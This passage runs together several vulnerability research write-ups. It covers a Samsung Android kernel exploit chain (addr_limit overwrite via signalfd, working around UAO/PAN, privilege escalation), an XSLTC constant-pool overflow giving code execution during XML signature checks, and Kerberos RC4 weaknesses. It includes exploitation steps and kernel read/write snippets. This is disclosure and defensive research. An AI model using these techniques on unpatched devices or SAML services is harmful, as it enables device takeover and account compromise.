The exploit then calls dup2 on the dangling FD’s. The dup2 syscall will open another fd on the same open file structure that the original points to. In this case, the exploit is calling dup2 to verify that they successfully reallocated a fake file structure in the same place as the freed file structure. dup2 will increment the reference count (f_count) in the file structure. In all of our fake file structures, the f_count was set to 0x7F. So if any of them are incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.
To determine if any of the file struct’s refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory’s mem_profile contents. If it finds the byte 0x80, then it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.
Overwriting the addr_limit
Like many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS or0x7FFFFFFFFF. For kernel threads, it’s usually KERNEL_DS or 0xFFFFFFFFFFFFFFFF.
Userspace operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.
signalfd(dangling_fd,0xFFFFFF8000000000,8);
According to the man pages, the syscall signalfd is:
signalfd() creates a file descriptor that can be used to accept signals targeted at the caller. This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).
int signalfd(int fd,const sigset_t *mask,int flags);
The exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the signmask of the signalfd_ctx struct..
typedefunsignedlong sigset_t;
struct signalfd_ctx {
sigset_t sigmask;
};
The file struct includes a field called private_data that is a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8 byte structure that contains the mask.
Let’s walk through how the signalfd source code updates the mask:
First the function modifies the mask that was passed in. The mask passed into the function is the signals that should be accepted via the file descriptor, but the sigmask member of the signalfd struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] makes this change. The call to sigdelsetmask ensures that the SIG_KILL and SIG_STOP signals are always blocked so it clears bit 8 (SIG_KILL) and bit 18 (SIG_STOP) in order for them to be set in the next call. Then signotset flips each bit in the mask. The mask that is written is ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF).
The function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit’s case it’s not so we fall into the else block at [3]. At [4] the signalfd_ctx* is set to the private_data pointer.
The signalfd manual page also says that the fd argument “must specify a valid existing signalfd file descriptor”. To verify this, at [5] the syscall checks if the underlying file’s f_op equals the signalfd_ops. This is why the f_op was set to signalfd_ops in the previous section. Finally at [6], the overwrite occurs. The user provided mask is written to the address in private_data. In the exploit’s case, the fake file struct’s private_data was set to the addr_limit pointer. So when the mask is written, we’re actually overwriting the addr_limit.
The exploit calls signalfd with a mask argument of 0xFFFFFF8000000000. So the value ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFCFEFF) = 0x7FFFFFFFFF, also known asUSER_DS. We’ll talk about why they’re overwriting the addr_limit as USER_DS rather than KERNEL_DS in the next section.
Working Around UAO and PAN
“User-Access Override” (UAO) and “Privileged Access Never” (PAN) are two exploit mitigations that are commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both PAN and UAO are hardware mitigations released on ARMv8 CPUs. PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.
It’s often said that the addr_limit overwrite technique detailed above doesn’t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our proof-of-concept for CVE-2019-2215 back in 2019. Our kernel_write function is shown below.
if(len >0x1000) errx(1,"kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
if(write(kernel_rw_pipe[1], buf, len)!= len) err(1,"kernel_write failed to load userspace buffer");
if(read(kernel_rw_pipe[0],(void*)kaddr, len)!= len) err(1,"kernel_write failed to overwrite kernel memory");
}
This technique works by first writing the pointer to the buffer of the contents that you’d like written to one end of the pipe. By then calling a read and passing in the kernel address you’d like to write to, those contents are then written to that kernel memory address.
With UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.
Let’s say we didn’t set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that’s not KERNEL_DS. PAN wouldn’t be enabled, but neither would UAO. Without UAO enabled, the unprivileged load and store instructions are not able to access the kernel memory.
The way the exploit works around the constraints of UAO and PAN is pretty straightforward: the exploit switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and is disabled when it does not.
/* Restore the UAO state depending on next's addr_limit */
The exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because they had such a good primitive from the use-after-free and could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit’s function to write to kernel addresses is shown below:
The function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is currently set to USER_DS. At [1] the exploit writes the buffer pointer to the pipe. A pointer to the USER_DS value is written to the pipe at [2].
The set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the bits provided in the mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit.
Now that the addr_limit is set to KERNEL_DS the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit returns addr_limit back to USER_DS by reading the value from the pipe that was written at [2] and writing it back to the addr_limit. The exploit’s function to read from kernel memory is the mirror image of this function.
I deliberately am not calling this a bypass because UAO and PAN are acting exactly as they were designed to act: preventing the kernel from accessing user-space memory. UAO and PAN were not developed to protect against arbitrary write access to the addr_limit.
Post-exploitation
The exploit now has arbitrary kernel read and write. It then follows the steps as seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process’s context to vold.vold is the “Volume Daemon” which is responsible for mounting and unmounting of external storage. vold runs as root and while it's a userspace service, it’s considered kernel-equivalent as described in the Android documentation on security contexts. Because it’s a highly privileged security context, it makes a prime target for changing the SELinux context to.
As stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.
Conclusion
This in-the-wild exploit chain is a great example of different attack surfaces and “shape” than many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel. It’s also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety. Of the 10 other Android in-the-wild 0-days that we’ve tracked since mid-2014, only 2 of those were not memory corruption vulnerabilities.
The first vulnerability in this chain, the arbitrary file read and write, CVE-2021-25337, was the foundation of this chain, used 4 different times and used at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. The Java components in Android devices don’t tend to be the most popular targets for security researchers despite it running at such a privileged level. This highlights an area for further research.
Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know.
The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different “shapes” and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we’re at least 18 months behind the attackers: they already know which bugs they’re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage.
This transparent disclosure of in-the-wild status is necessary for both the safety and autonomy of targeted users to protect themselves as well as the security industry to work together to best prevent these 0-days in the future.
Earlier this year, I discovered a surprising attack surface hidden deep inside Java’s standard library: A custom JIT compiler processing untrusted XSLT programs, exposed to remote attackers during XML signature verification. This post discusses CVE-2022-34169, an integer truncation bug in this JIT compiler resulting in arbitrary code execution in many Java-based web applications and identity providers that support the SAML single-sign-on standard.
OpenJDK fixed the discussed issue in July 2022. The Apache BCEL project used by Xalan-J, the origin of the vulnerable code, released a patch in September 2022.
While the vulnerability discussed in this post has been patched , vendors and users should expect further vulnerabilities in SAML.
From a security researcher's perspective, this vulnerability is an example of an integer truncation issue in a memory-safe language, with an exploit that feels very much like a memory corruption. While less common than the typical memory safety issues of C or C++ codebases, weird machines still exist in memory safe languages and will keep us busy even after we move into a bright memory safe future.
Before diving into the vulnerability and its exploit, I’m going to give a quick overview of XML signatures and SAML. What makes XML signatures such an interesting target and why should we care about them?
Introduction
XML Signatures are a typical example of a security protocol invented in the early 2000’s. They suffer from high complexity, a large attack surface and a wealth of configurable features that can weaken or break its security guarantees in surprising ways. Modern usage of XML signatures is mostly restricted to somewhat obscure protocols and legacy applications, but there is one important exception: SAML. SAML, which stands for Security Assertion Markup Language, is one of the two main Single-Sign-On standards used in modern web applications. While its alternative, the OAuth based OpenID Connect (OIDC) is gaining popularity, SAML is still the de-facto standard for large enterprises and complex integrations.
SAML relies on XML signatures to protect messages forwarded through the browser. This turns XML signature verification into a very interesting external attack surface for attacking modern multi-tenant SaaS applications. While you don’t need a detailed understanding of SAML to follow this post, interested readers can take a look at Okta's Understanding SAML writeup or the SAML 2.0 wiki entry to get a better understanding of the protocol.
SAML SSO logins work by exchanging XML documents between the application, known as service provider (SP), and the identity provider (IdP). When a user tries to login to an SP, the service provider creates a SAML request. The IdP looks at the SAML request, tries to authenticate the user and sends a SAML response back to the SP. A successful response will contain information about the user, which the application can then use to grant access to its resources.
In the most widely used SAML flow (known as SP Redirect Bind / IdP POST Response) these documents are forwarded through the user's browser using HTTP redirects and POST requests. To protect against modification by the user, the security critical part of the SAML response (known as Assertion) has to be cryptographically signed by the IdP. In addition, the IdP might require SPs to also sign the SAML request to protect against impersonation attacks.
This means that both the IdP and the SP have to parse and verify XML signatures passed to them by a potential malicious actor. Why is this a problem? Let's take a closer look at the way XML signatures work:
XML Signatures
Most signature schemes operate on a raw byte stream and sign the data as seen on the wire. Instead, the XML signature standard (known as XMLDsig) tries to be robust against insignificant changes to the signed XML document. This means that changing whitespaces, line endings or comments in a signed document should not invalidate its signature.
An XML signature consists of a special Signature element, an example of which is shown below:
The SignedInfo child contains CanonicalizationMethod and SignatureMethod elements as well as one or more Reference elements describing the integrity protected data.
KeyInfo describes the signer key and can contain a raw public key, a X509 certificate or just a key id.
SignatureValue contains the cryptographic signature (using SignatureMethod) of the SignedInfo element after it has been canonicalized using CanonicalizationMethod.
At this point, only the integrity of the SignedInfo element is protected. To understand how this protection is extended to the actual data, we need to take a look at the way Reference elements work: In theory the Reference URI attribute can either point to an external document (detached signature), an element embedded as a child (enveloping signature) or any element in the outer document (enveloped signature). In practice, most SAML implementations use enveloped signatures and the Reference URI will point to the signed element somewhere in the current document tree.
When a Reference is processed during verification or signing, the referenced content is passed through a chain of Transforms. XMLDsig supports a number of transforms ranging from canonicalization, over base64 decoding to XPath or even XSLT. Once all transforms have been processed the resulting byte stream is passed into the cryptographic hash function specified with the DigestMethod element and the result is stored in DigestValue.
This way, as the whole Reference element is part of SignedInfo, its integrity protection gets extended to the referenced element as well.
Validating a XML signature can therefore be split into two separate steps:
Reference Validation: Iterate through all embedded references and for each reference fetch the referenced data, pump it through the Transforms chain and calculate its hash digest. Compare the calculated Digest with the stored DigestValue and fail if they differ.
Signature Validation: First canonicalize the SignedInfo element using the specified CanonicalizationMethod algorithm. Calculate the signature of SignedInfo using the algorithm specified in SignatureMethod and the signer key described in KeyInfo. Compare the result with SignatureValue and fail if they differ.
Interestingly, the order of these two steps can be implementation specific. While the XMLDsig RFC lists Reference Validation as the first step, performing Signature Validation first can have security advantages as we will see later on.
Correctly validating XML signatures and making sure the data we care about is protected, is very difficult in the context of SAML. This will be a topic for later blog posts, but at this point we want to focus on the reference validation step:
As part of this step, the application verifying a signature has to run attacker controlled transforms on attacker controlled input. Looking at the list of transformations supported by XMLDsig, one seems particularly interesting: XSLT.
XSLT, which stands for Extensible Stylesheet Language Transformations, is a feature-rich XML based programming language designed for transforming XML documents. Embedding a XSLT transform in a XML signature means that the verifier has to run the XSLT program on the referenced XML data.
The code snippet below gives you an example of a simple XSLT transformation. When executed it fetches each <data> element stored inside <input>, grabs the first character of its content and returns it as part of its <output>. So <input><data>abc</data><data>def</data></input> would be transformed into <output><data>a</data><data>d</data></output>
Exposing a fully-featured language runtime to an external attacker seems like a bad idea, so let's take a look at how this feature is implemented in Java’s OpenJDK.
XSLT in Java
Java’s main interface for working with XML signatures is the java.xml.crypto.XMLSignature class and its sign and validate methods. We are mostly interested in the validate method which is shown below:
for(int i =0, size = refs.size(); validateRefs && i < size; i++){
Referenceref= refs.get(i);
boolean refValid =ref.validate(vc);(B)
LOG.debug("Reference [{}] is valid: {}",ref.getURI(), refValid);
validateRefs &= refValid;
}
if(!validateRefs){
LOG.debug("Couldn't validate the References");
validationStatus =false;
validated =true;
return validationStatus;
}
[..]
}
As we can see, the validate method first validates the signature of the SignedInfo element in (A) before validating all the references in (B). This means that an attack against the XSLT runtime will require a valid signature for the SignedInfo element and we’ll discuss later how an attacker can bypass this requirement.
The call to ref.validate() in (B) ends up in the DomReference.validate method shown below:
The code gets the referenced data in (D), transforms it in (E) and compares the digest of the result with the digest stored in the signature in (F). Most of the complexity is hidden behind the call to transform in (E) which loops through all Transform elements defined in the Reference and executes them.
As this is Java, we have to walk through a lot of indirection layers before we end up at the interesting parts. Take a look at the call stack below if you want to follow along and step through the code:
at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:584) at com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl.newTransformer(TransformerFactoryImpl.java:818) at com.sun.org.apache.xml.internal.security.transforms.implementations.TransformXSLT.enginePerformTransform(TransformXSLT.java:130) at com.sun.org.apache.xml.internal.security.transforms.Transform.performTransform(Transform.java:316) at org.jcp.xml.dsig.internal.dom.ApacheTransform.transformIt(ApacheTransform.java:188) at org.jcp.xml.dsig.internal.dom.ApacheTransform.transform(ApacheTransform.java:124) at org.jcp.xml.dsig.internal.dom.DOMTransform.transform(DOMTransform.java:173) at org.jcp.xml.dsig.internal.dom.DOMReference.transform(DOMReference.java:457) at org.jcp.xml.dsig.internal.dom.DOMReference.validate(DOMReference.java:387) at org.jcp.xml.dsig.internal.dom.DOMXMLSignature.validate(DOMXMLSignature.java:281)
If we specify a XSLT transform and the org.jcp.xml.dsig.secureValidation property isn't enabled (we’ll come back to this later) we will end up in the file src/java.xml/share/classes/com/sun/org/apache/xalan/internal/xsltc/trax/TransformerFactoryImpl.java which is part of a module called XSLTC.
XSLTC, the XSLT compiler, is originally part of the Apache Xalan project. OpenJDK forked Xalan-J, a Java based XSLT runtime, to provide XSLT support as part of Java’s standard library. While the original Apache project has a number of features that are not supported in the OpenJDK fork, most of the core code is identical and CVE-2022-34169 affected both codebases.
XSLTC is responsible for compiling XSLT stylesheets into Java classes to improve performance compared to a naive interpretation based approach. While this has advantages when repeatedly running the same stylesheet over large amounts of data, it is a somewhat surprising choice in the context of XML signature validation. Thinking about this from an attacker's perspective, we can now provide arbitrary inputs to a fully-featured JIT compiler. Talk about an unexpected attack surface!
A bug in XSLTC
/**
* As Gregor Samsa awoke one morning from uneasy dreams he found himself
* transformed in his bed into a gigantic insect. He was lying on his hard,
* as it were armour plated, back, and if he lifted his head a little he
* could see his big, brown belly divided into stiff, arched segments, on
* top of which the bed quilt could hardly keep in position and was about
* to slide off completely. His numerous legs, which were pitifully thin
* compared to the rest of his bulk, waved helplessly before his eyes.
* "What has happened to me?", he thought. It was no dream....
Turns out that the author of this codebase was a Kafka fan.
So what does this compilation process look like? XSLTC takes a XSLT stylesheet as input and returns a JIT'ed Java class, called translet, as output. The JVM then loads this class, constructs it and the XSLT runtime executes the transformation via a JIT'ed method.
Java class files contain the JVM bytecode for all class methods, a so-called constant pool describing all constants used and other important runtime details such as the name of its super class or access flags.
cp_info constant_pool[constant_pool_count-1]; // cp_info is a variable-sized object
u2 access_flags;
u2 this_class;
u2 super_class;
u2 interfaces_count;
u2 interfaces[interfaces_count];
u2 fields_count;
field_info fields[fields_count];
u2 methods_count;
method_info methods[methods_count];
u2 attributes_count;
attribute_info attributes[attributes_count];
}
XSLTC depends on the Apache Byte Code Engineering Library (BCEL) to dynamically create Java class files. As part of the compilation process, constants in the XSLT input such as Strings or Numbers get translated into Java constants, which are then stored in the constant pool. The following code snippet shows how an XSLT integer expression gets compiled: Small integers that fit into a byte or short are stored inline in bytecode using the bipush or sipush instructions. Larger ones are added to the constant pool using the cp.addInteger method:
The problem with this approach is that neither XSLTC nor BCEL correctly limits the size of the constant pool. As constant_pool_count, which describes the size of the constant pool, is only 2 bytes long, its maximum size is limited to 2**16 - 1 or 65535 entries. In practice even fewer entries are possible, because some constant types take up two entries. However, BCELs internal constant pool representation uses a standard Java Array for storing constants, and does not enforce any limits on its length.
When XSLTC processes a stylesheet that contains more constants, and BCELs internal class representation is serialized to a class file at the end of the compilation process the array length is truncated to a short, but the complete array is written out:
This means that constant_pool_count will now contain a small value and that parts of the attacker-controlled constant pool will get interpreted as the class fields following the constant pool, including method and attribute definitions.
Exploiting a constant pool overflow
To understand how we can exploit this, we first need to take a closer look at the content of the constant pool. Each entry in the pool starts with a 1-byte tag describing the kind of constant, followed by the actual data. The table below shows an incomplete list of constant types supported by the JVM (see the official documentation for a complete list). No need to read through all of them but we will come back to this table a lot when walking through the exploit.
Describes a method type. Points to a UTF8 constant containing a method descriptor.
CONSTANT_MethodType_info {
u1 tag;
u2 descriptor_index;
}
A perfect constant type for exploiting CVE-2022-34169 would be dynamically sized containing fully attacker controlled content. Unfortunately, no such type exists. While CONSTANT_Utf8 is dynamically sized, its content isn’t a raw string representation but an encoding format JVM calls “modified UTF-8”. This encoding introduces some significant restrictions on the data stored and rules out null bytes, making it mostly useless for corrupting class fields.
The next best thing we can get is a fixed size constant type with full control over the content. CONSTANT_Long seems like an obvious candidate, but XSLTC never creates attacker-controlled long constants during the compilation process. Instead we can use large floating numbers to create CONSTANT_Double entry with (almost) fully controlled content. This gives us a nice primitive where we can corrupt class fields behind the constant pool with a byte pattern like 0x060xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0x060xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY0x060xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ.
Unfortunately, this primitive alone isn’t sufficient for crafting a useful class file due to the requirements of the fields right after the constant_pool:
cp_info constant_pool[constant_pool_count-1];
u2 access_flags;
u2 this_class;
u2 super_class;
access_flagsis a big endian mask of flags describing access permissions and properties of the class.
While the JVM is happy to ignore unknown flag values, we need to avoid setting flags like ACC_INTERFACE (0x0200) or ACC_ABSTRACT (0x0400) that result in an unusable class. This means that we can’t use a CONSTANT_Double entry as our first out-of-bound constant as its tag byte of 0x06 will get interpreted as these flags.
this_class is an index into the constant pool and has to point to a CONSTANT_Class entry that describes the class defined with this file. Fortunately, neither the JVM nor XSLTC cares much about which class we pretend to be, so this value can point to almost any CONSTANT_Class entry that XSLTC ends up generating. (The only restriction is that it can’t be a part of a protected namespace like java.lang.)
super_class is another index to a CONSTANT_Class entry in the constant pool. While the JVM is happy with any class, XSLTC expects this to be a reference to the org.apache.xalan.xsltc.runtime.AbstractTranslet class, otherwise loading and initialization of the class file fails.
After a lot of trial and error I ended up with the following approach to meet these requirements:
We craft a XSLT input that results in 0x10703 constants in the pool. This will result in a truncated pool size of 0x703 and the start of the constant at index 0x703 (due to 0 based indexing) will be interpreted as access_flags.
During compilation of the input, we trigger the addition of a new string constant when the pool has 0x702 constants. This will first create a CONSTANT_Utf8 entry at index 0x702 and a CONSTANT_String entry at 0x703. The String entry will reference the preceding Utf8 constant so its value will be the tag byte 0x08 followed by the index 0x07 0x02. This results in an usable access_flags value of 0x0807.
Add a CONSTANT_Double entry at index 0x704. Its 0x06 tag byte will be interpreted as part of the this_class field. The following 2 bytes can then be used to control the value of the super_class field. By setting the next 4 bytes to 0x00, we create an empty interface and fields arrays, before setting the last two bytes to the number of methods we want to define.
The only remaining requirement is that we need to add a CONSTANT_Class entry at index 0x206 of the constant pool, which is relatively straightforward.
The snippet below shows part of the generated XSLT input that will overwrite the first header fields. After filling the constant pool with a large number of string constants for the attribute fields and values, the CONST_STRING entry for the `jEb` element ends up at index 0x703. The XSLT function call to the `ceiling` function then triggers the addition of a controlled CONST_DOUBLE entry at index 0x704:
We constructed the initial header fields and are now in the interesting part of the class file definition: The methods table. This is where all methods of a class and their bytecode is defined. After XSLTC generates a Java class, the XSLT runtime will load the class and instantiate an object, so the easiest way to achieve arbitrary code execution is to create a malicious constructor. Let’s take a look at the methods table to see how we can define a working constructor:
ClassFile{
[...]
u2 methods_count;
method_info methods[methods_count];
[...]
}
method_info {
u2 access_flags;
u2 name_index;
u2 descriptor_index;
u2 attributes_count;
attribute_info attributes[attributes_count];
}
attribute_info {
u2 attribute_name_index;
u4 attribute_length;
u1 info[attribute_length];
}
Code_attribute{
u2 attribute_name_index;
u4 attribute_length;
u2 max_stack;
u2 max_locals;
u4 code_length;
u1 code[code_length];
u2 exception_table_length;
{ u2 start_pc;
u2 end_pc;
u2 handler_pc;
u2 catch_type;
} exception_table[exception_table_length];
u2 attributes_count;
attribute_info attributes[attributes_count];
}
The methods table is a dynamically sized array of method_info structs. Each of these structs describes the access_flags of the method, an index into the constant table that points to its name (as a utf8 constant), and another index pointing to the method descriptor (another CONSTANT_Utf8).
This is followed by the attributes table, a dynamically sized map from Utf8 keys stored in the constant table to dynamically sized values stored inline. Fortunately, the only attribute we need to provide is the Code attribute, which contains the actual bytecode of the method.
Going back to our payload, we can see that the start of the methods table is aligned with the tag byte of the next entry in the constant pool table. This means that the 0x06 tag of a CONSTANT_Double will clobber the access_flag field of the first method, making it unusable for us. Instead we have to create two methods: The first one as a basic filler to get the alignment right, and the second one as the actual constructor. Fortunately, the JVM ignores unknown attributes, so we can use dynamically sized attribute values. The graphic below shows how we use a series of CONST_DOUBLE entries to create a constructor method with an almost fully controlled body.
We still need to bypass one limitation: JVM bytecode does not work standalone, but references and relies on entries in the constant pool. Instantiating a class or calling a method requires a corresponding constant entry in the pool. This is a problem as our bug doesn’t give us the ability to create fake constant pool entries so we are limited to constants that XSLTC adds during compilation.
Luckily, there is a way to add arbitrary class and method references to the constant pool: Java’s XSLT runtime supports calling arbitrary Java methods. As this is clearly insecure, this functionality is protected by a runtime setting and always disabled during signature verification.
However, XSLTC will still process and compile these function calls when processing a stylesheet and the call will only be blocked during runtime (see the corresponding code in FunctionCall.java). This means that we can get references to all required methods and classes by adding a XSLT element like the one shown below:
There are two final checks we need to bypass, before we end up with a working class file:
The JVM enforces that every constructor of a subclass, calls a superclass constructor before returning. This check can be bypassed by never returning from our constructor either by adding an endless loop at the end or throwing an exception, which is the approach I used in my exploit Proof-of-Concept. A slightly more complex, but cleaner approach is to add a reference to the AbstractTranslet constructor to the object pool and call it. This is the approach used by thanat0s in their exploit writeup.
Finally, we need to skip over the rest of XSLTC’s output. This can be done by constructing a single large attribute with the right size as an element in the class attribute table.
Once we chain all of this together we end up with a signed XML document that can trigger the execution of arbitrary JVM bytecode during signature verification. I’ve skipped over some implementation details of this exploit, so if you want to reproduce this vulnerability please take a look at the heavily commented proof-of-concept script.
Impact and Restrictions
In theory every unpatched Java application that processes XML signatures is vulnerable to this exploit. However, there are two important restrictions:
As references are only processed after the signature of the SignedInfo element is verified, applications can be protected based on their usage of the KeySelector class. Applications that use a allowlist of trusted keys in their KeySelector will be protected as long as these keys are not compromised. An example of this would be a single-tenant SAML SP configured with a single trusted IdP key. In practice, a lot of these applications are still vulnerable as they don’t use KeySelector directly and will instead enforce this restriction in their own application logic after an unrestricted signature validation. At this point the vulnerability has already been triggered. Multi-tenant SAML applications that support customer-provided Identity Providers, as most modern cloud SaaS do, are also not protected by this limitation.
SAML Identity Providers can only be attacked if they support (and verify) signed SAML requests.
Even without CVE-2022-34169, processing XSLT during signature verification can be easily abused as part of a DoS attack. For this reason, the property org.jcp.xml.dsig.secureValidation can be enabled to forbid XSLT transformation in XML signatures. Interestingly this property defaults to false for all JDK versions <17, if the application is not running under the Java security manager. As the Security Manager is rarely used for server side applications and JDK 17 was only released a year ago, we expect that a lot of applications are not protected by this. Limited testing of large java-based SSO providers confirmed this assumption. Another reason for a lack of widespread usage might be that org.jcp.xml.dsig.secureValidation also disables use of the SHA1 algorithm in newer JDK versions. As SHA1 is still widely used by enterprise customers, simply enabling the property without manually configuring a suitable jdk.xml.dsig.secureValidationPolicy might not be feasible.
Conclusion
XML signatures in general and SAML in particular offer a large and complex attack surface to external attackers. Even though Java offers configuration options that can be used to address this vulnerability, they are complex, might break real-world use cases and are off by default.
Developers that rely on SAML should make sure they understand the risks associated with it and should reduce the attack surface as much as possible by disabling functionality that is not required for their use case. Additional defense-in-depth approaches like early validation of signing keys, an allow-list based approach to valid transformation chains and strict schema validation of SAML tickets can be used for further hardening.
I've been spending a lot of time researching Windows authentication implementations, specifically Kerberos. In June 2022 I found an interesting issue number 2310 with the handling of RC4 encryption that allowed you to authenticate as another user if you could either interpose on the Kerberos network traffic to and from the KDC or directly if the user was configured to disable typical pre-authentication requirements.
This blog post goes into more detail on how this vulnerability works and how I was able to exploit it with only a bare minimum of brute forcing required. Note, I'm not going to spend time fully explaining how Kerberos authentication works, there's plenty of resources online. For example this blog post by Steve Syfuhs who works at Microsoft is a good first start.
Background
Kerberos is a very old authentication protocol. The current version (v5) was described in RFC1510 back in 1993, although it was updated in RFC4120 in 2005. As Kerberos' core security concept is using encryption to prove knowledge of a user's credentials the design allows for negotiating the encryption and checksum algorithms that the client and server will use.
For example when sending the initial authentication service request (AS-REQ) to the Key Distribution Center (KDC) a client can specify a list supported encryption algorithms, as predefined integer identifiers, as shown below in the snippet of the ASN.1 definition from RFC4120.
KDC-REQ-BODY ::= SEQUENCE {
...
etype [8] SEQUENCE OF Int32 -- EncryptionType
-- in preference order --,
...
}
When the server receives the request it checks its list of supported encryption types and the ones the user's account supports (which is based on what keys the user has configured) and then will typically choose the one the client most preferred. The selected algorithm is then used for anything requiring encryption, such as generating session keys or the EncryptedData structure as shown below:
EncryptedData ::= SEQUENCE {
etype [0] Int32 -- EncryptionType --,
kvno [1] UInt32 OPTIONAL,
cipher [2] OCTET STRING -- ciphertext
}
The KDC will send back an authentication service reply (AS-REP) structure containing the user's Ticket Granting Ticket (TGT) and an EncryptedData structure which contains the session key necessary to use the TGT to request service tickets. The user can then use their known key which corresponds to the requested encryption algorithm to decrypt the session key and complete the authentication process.
This flexibility in selecting an encryption algorithm is both a blessing and a curse. In the original implementations of Kerberos only DES encryption was supported, which by modern standards is far too weak. Because of the flexibility developers were able to add support for AES through RFC3962 which is supported by all modern versions of Windows. This can then be negotiated between client and server to use the best algorithm both support. However, unless weak algorithms are explicitly disabled there's nothing stopping a malicious client or server from downgrading the encryption algorithm in use and trying to break Kerberos using cryptographic attacks.
Modern versions of Windows have started to disable DES as a supported encryption algorithm, preferring AES. However, there's another encryption algorithm which Windows supports which is still enabled by default, RC4. This algorithm was used in Kerberos by Microsoft for Windows 2000, although its documentation was in draft form until RFC4757 was released in 2006.
The RC4 stream cipher has many substantial weaknesses, but when it was introduced it was still considered a better option than DES which has been shown to be sufficiently vulnerable to hardware cracking such as the EFF's "Deep Crack". Using RC4 also had the advantage that it was relatively easy to operate in a reduced key size mode to satisfy US export requirements of cryptographic systems.
If you read the RFC for the implementation of RC4 in Kerberos, you'll notice it doesn't use the stream cipher as is. Instead it puts in place various protections to guard against common cryptographic attacks:
The encrypted data is protected by a keyed MD5 HMAC hash to prevent tampering which is trivial with a simple stream cipher such as RC4. The hashed data includes a randomly generated 8-byte "confounder" so that the hash is randomized even for the same plain text.
The key used for the encryption is derived from the hash and a base key. This, combined with the confounder makes it almost certain the same key is never reused for the encryption.
The base key is not the user's key, but instead is derived from a MD5 HMAC keyed with the user's key over a 4 byte message type value. For example the message type is different for the AS-REQ and the AS-REP structures. This prevents an attacker using Kerberos as an encryption oracle and reusing existing encrypted data in unrelated parts of the protocol.
Many of the known weaknesses of RC4 are related to gathering a significant quantity of ciphertext encrypted with a known key. Due to the design of the RC4-HMAC algorithm and the general functional principles of Kerberos this is not really a significant concern. However, the biggest weakness of RC4 as defined by Microsoft for Kerberos is not so much the algorithm, but the generation of the user's key from their password.
As already mentioned Kerberos was introduced in Windows 2000 to replace the existing NTLM authentication process used from NT 3.1. However, there was a problem of migrating existing users to the new authentication protocol. In general the KDC doesn't store a user's password, instead it stores a hashed form of that password. For NTLM this hash was generated from the Unicode password using a single pass of the MD4 algorithm. Therefore to make an easy upgrade path Microsoft specified that the RC4-HMAC Kerberos key was this same hash value.
As the MD4 output is 16 bytes in size it wouldn't be practical to brute force the entire key. However, the hash algorithm has no protections against brute-force attacks for example no salting or multiple iterations. If an attacker has access to ciphertext encrypted using the RC4-HMAC key they can attempt to brute force the key through guessing the password. As user's will tend to choose weak or trivial passwords this increases the chance that a brute force attack would work to recover the key. And with the key the attacker can then authenticate as that user to any service they like.
